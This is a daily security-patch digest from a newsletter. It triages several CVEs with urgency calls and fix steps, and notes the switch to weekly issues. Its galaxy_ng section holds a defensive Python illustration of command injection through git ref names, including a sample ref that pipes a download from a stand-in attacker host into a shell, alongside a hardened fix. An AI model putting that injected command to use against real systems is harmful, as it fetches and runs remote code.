PatchDayAlert: 2026-06-18
PatchDayAlert DAILY BRIEF · JUNE 18, 2026

PROGRAMMING CHANGE

This is the last daily digest. PatchDayAlert goes weekly starting Wednesday, June 24.

You'll get one issue a week instead of one every morning. Same triage, same do-this-first framing, fewer emails. Coverage doesn't shrink: the weekly rounds up every CVE worth acting on from the prior seven days, from the same sources, with the same urgency calls. Your first weekly issue lands Wednesday, June 24.

TODAY'S CALL

Nothing's on fire, but don't sleep on this one. A Firefox/Thunderbird sandbox escape (CVE-2026-12289, CVSS 8.8) lets attackers escalate privileges through the WebRender graphics component if a user hits a malicious page or opens a crafted email. No exploitation in the wild yet, but the attack surface is huge. Four more high-severity bugs round out the day, including a Dell OpenManage RCE and a Pacemaker cluster crasher.

DO FIRST

Update Firefox to 152 (or ESR 140.12 / ESR 115.37) and Thunderbird to 152 (or ESR 140.12) through your package manager or Mozilla's update channel (CVE-2026-12289)
Update the Dell OpenManage Integration plugin for Windows Admin Center to the latest version from Dell's support site (CVE-2024-24909)
Update the pacemaker package to the patched version from your distribution's repositories and restart the cluster services (CVE-2026-10649)
Update galaxy_ng to the patched version (CVE-2026-12398)
Upgrade SUSE Harvester to version 1.8.0 or later (CVE-2025-71261)

Clear the most in the fewest moves

One update closes multiple CVEs at once. Each row is one maintenance decision.

Action:   Update Firefox to 152 (or ESR 140.12 / ESR 115.37) and Thunderbird to 152 (or ESR 140.12) through your package manager or Mozilla's update channel
CVEs:     44 (3 critical)
Urgency:  Patch this week; network-reachable systems only
Impact:   Browser relaunch

TOP THREAT TODAY

CVE-2026-12289 CVSS 8.8 HIGH

An attacker can escalate privileges through the WebRender graphics component in Firefox and Thunderbird. If a user visits a malicious page or opens a crafted email, the attacker could break out of normal browser sandboxing and gain elevated access on the system. CVSS 8.8, not yet exploited in the wild.

Who's affected: Anyone running Firefox (release or ESR) or Thunderbird on any platform


Patch this week. Update Firefox to 152 (or ESR 140.12 / ESR 115.37) and Thunderbird to 152 (or ESR 140.12) through your package manager or Mozilla's update channel.

Exposure: Network-reachable systems  ·  Op impact: Browser relaunch

One update · 44 CVEs · 3 critical

CVE-2024-24909 CVSS 8.8 HIGH

A remote authenticated user can execute arbitrary code through Dell's OpenManage Integration plugin for Windows Admin Center. Successful exploitation lets the attacker escalate privileges, potentially taking full control of the gateway host. CVSS 8.8, not exploited in the wild.

Affects: Windows admins running Dell OpenManage Integration with Microsoft Windows Admin Center


Patch within 24 hours for internet-facing systems. Update the Dell OpenManage Integration plugin for Windows Admin Center to the latest version from Dell's support site.

Exposure: Internet-facing systems  ·  Op impact: Endpoint reboot


CVE-2026-10649 CVSS 8.6 HIGH

An unauthenticated remote attacker can crash the Pacemaker CIB remote listener by sending a specially crafted compressed message. The bug is an integer overflow in the decompression path that triggers memory corruption before any authentication check. This is a denial-of-service issue that can take down your cluster management layer. CVSS 8.6. Note that the CIB remote listener only runs when the remote-tls-port or remote-clear-port cluster property has been set; if you have never set either, you are not exposed over the network and can patch on your normal cadence.

Affects: Linux sysadmins running Pacemaker-based HA clusters with CIB remote listeners exposed on the network


Patch within 24 hours for internet-facing systems. Update the pacemaker package to the patched version from your distribution's repositories and restart the cluster services.

Exposure: Internet-facing systems


CVE-2026-12398 CVSS 7.5 HIGH

An authenticated user who controls an external git repository can inject shell commands through crafted branch or tag names when importing legacy roles via the Galaxy NG v1 API. This gives the attacker remote code execution on the Pulp worker. The catch: the vulnerable endpoint is only reachable when GALAXY_ENABLE_LEGACY_ROLES is set to True, which is not the default. CVSS 7.5.

Affects: Ansible Automation Hub or Galaxy NG operators who have enabled GALAXY_ENABLE_LEGACY_ROLES=True


Patch this week. Update galaxy_ng to the patched version. If you can't patch immediately, set GALAXY_ENABLE_LEGACY_ROLES to False to disable the vulnerable legacy role import endpoint.

Exposure: Internet-facing systems
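The bug class here is worth seeing in code: a git branch or tag name that the attacker controls gets interpolated into a shell command line, so shell metacharacters in the ref name become extra commands on the worker. The example below is added for this digest and is not galaxy_ng's implementation; the function names, the clone command shape, the repository URL and the malicious ref are all constructed for illustration. It shows the vulnerable string-building pattern, how a POSIX shell would split the resulting line, and a hardened path that validates the ref name and passes an argv list with no shell.

```python
"""Command injection via git ref names: vulnerable pattern and hardened form.

Added illustration, not galaxy_ng code. Names and sample data are assumed.
"""
import re
import shlex
import subprocess
from typing import List

# Constructed sample inputs (not real hosts or repositories).
REPO_URL = "https://git.example.com/legacy-role.git"
MALICIOUS_REF = "v1.0; curl http://attacker.example/x | sh"

# Simplified subset of git's ref-name rules: starts alphanumeric (so it can never
# look like an option), then only [A-Za-z0-9._/+-]; no '..', no '//', no trailing
# '/' or '.lock'. Stricter than git itself, which is fine for an import endpoint.
_REF_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/+-]*$")


def is_safe_ref_name(ref: str) -> bool:
    """Return True only for ref names that are safe to hand to git as a value."""
    if not _REF_RE.fullmatch(ref):
        return False
    if ".." in ref or "//" in ref or ref.endswith("/") or ref.endswith(".lock"):
        return False
    return True


def vulnerable_checkout_cmd(repo_url: str, ref: str) -> str:
    """The dangerous pattern: untrusted ref interpolated into a shell string."""
    return f"git clone --branch {ref} {repo_url} /tmp/role"


def shell_command_list(cmdline: str) -> List[str]:
    """Approximate how /bin/sh splits a line into separate commands at ; | & &&.

    Used only to show what the injection does; nothing is executed.
    """
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands: List[str] = []
    current: List[str] = []
    for tok in lex:
        if tok in (";", "|", "||", "&&", "&"):
            commands.append(" ".join(current))
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(" ".join(current))
    return commands


def hardened_checkout_argv(repo_url: str, ref: str) -> List[str]:
    """Validate the ref, then build an argv list; '--' ends option parsing."""
    if not is_safe_ref_name(ref):
        raise ValueError(f"refusing unsafe ref name: {ref!r}")
    return ["git", "clone", "--branch", ref, "--", repo_url, "/tmp/role"]


def run_hardened(repo_url: str, ref: str) -> subprocess.CompletedProcess:
    """Execute the clone without a shell, so metacharacters are never interpreted."""
    argv = hardened_checkout_argv(repo_url, ref)
    return subprocess.run(argv, check=True, capture_output=True)  # never shell=True


if __name__ == "__main__":
    line = vulnerable_checkout_cmd(REPO_URL, MALICIOUS_REF)
    print("shell would run these commands separately:")
    for cmd in shell_command_list(line):
        print("  ", cmd)
    print("hardened argv:", hardened_checkout_argv(REPO_URL, "release/1.2"))
    try:
        hardened_checkout_argv(REPO_URL, MALICIOUS_REF)
    except ValueError as exc:
        print("hardened path rejected it:", exc)
```

The fix has two independent layers on purpose: the allowlist regex stops attacker-shaped names at the API boundary, and the argv-without-shell call means that even a name the regex lets through cannot become a second command. Either alone would close this specific injection; together they also cover the argument-injection case (a ref starting with `-`) that a shell-free call by itself does not.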


CVE-2025-71261 CVSS 8.6 HIGH

An attacker with network access between SUSE Harvester's virtualization layer and Rancher Manager can interfere with the TLS handshake and bypass TLS protections entirely. This means management traffic between these components could be intercepted or tampered with. CVSS 8.6, not exploited in the wild. Requires the attacker to be positioned on the internal network path between the two services.

Affects: Teams running SUSE Harvester versions before 1.8.0 with Rancher Manager integration


Patch this week. Upgrade SUSE Harvester to version 1.8.0 or later.

Exposure: Network-reachable systems


Community Signal Check

Check Point VPN authentication bypass exploited by Qilin ransomware affiliate

CVE-2026-50751 is a critical authentication bypass in Check Point Remote Access VPN (IKEv1 configs) that's been exploited in the wild since early May. At least one intrusion ties back to a Qilin ransomware affiliate. If you run Check Point VPN with IKEv1, patch now and check your logs for unauthorized sessions going back to May 7.

Check Point Research • active_exploitation

Cisco SD-WAN Manager path traversal exploited in the wild (CVE-2026-20262)

Attackers are actively exploiting a path traversal bug in Cisco Catalyst SD-WAN Manager that lets them create or overwrite files on the OS via crafted HTTP requests, then escalate to root. Cisco has patches out for supported releases. If you run SD-WAN Manager, update today.

Help Net Security • active_exploitation

Windows Netlogon stack overflow RCE exploited against domain controllers

CVE-2026-41089 is a stack-based buffer overflow in Windows Netlogon that gives attackers unauthenticated RCE against domain controllers. Belgium's CERT flagged active exploitation via crafted network requests. This one enables full domain compromise, so patch your DCs before anything else this cycle.

Help Net Security • active_exploitation

Remote Desktop printer redirection regression risk in June patches

Five separate June updates touch the Remote Desktop ActiveX control (mstscax.dll), and testers are flagging it as high risk for printer redirection regressions. Symptoms include missing redirected printers, failed print jobs, and session hangs on reconnect. Test RDP printing in staging before you push KB5094126, KB5094128, or KB5093998 to production.

Application Readiness • regression

SECURE BOOT · 6 days until Microsoft Secure Boot certificates begin expiring (June 24, 2026).

Also patched this window

Lower-priority items that cleared the enterprise filter. Scan for anything in your estate.

8.8  CVE-2026-44932
Passing of unsanitized strings from DHCP replies into the wicked dhcp client before wicked 0.6.79 could be used…
7.8  CVE-2026-24228
NVIDIA NeMo Framework for Linux contains a vulnerability where an attacker may cause deserialization of untrusted data.
8.3  CVE-2026-53853
OpenClaw before 2026.5.12 contains an argument pattern validation bypass in the exec allowlist that allows attackers…

Recent from the blog

The Cisco IOS XE reboot that wasn't remediation
Patching CVE-2023-20198 and rebooting the box clears the web shell but leaves the rogue admin account behind. If you ran one IOS XE web UI…

Juniper Junos OS has six KEV entries and two separate attack surfaces
Five CVSS 5.3 bugs in J-Web that chain to unauthenticated RCE, and a kernel isolation flaw exploited by a China-nexus actor to root MX rout…

A model was pulled for being too good at finding bugs
Anthropic shipped Claude Fable 5 and Mythos 5, then a federal directive killed both four days later. In May we forecast the patch window ha…

That's your patch day digest, and the last daily one. We'll see you Wednesday, June 24, for the first weekly issue.

patchdayalert.com
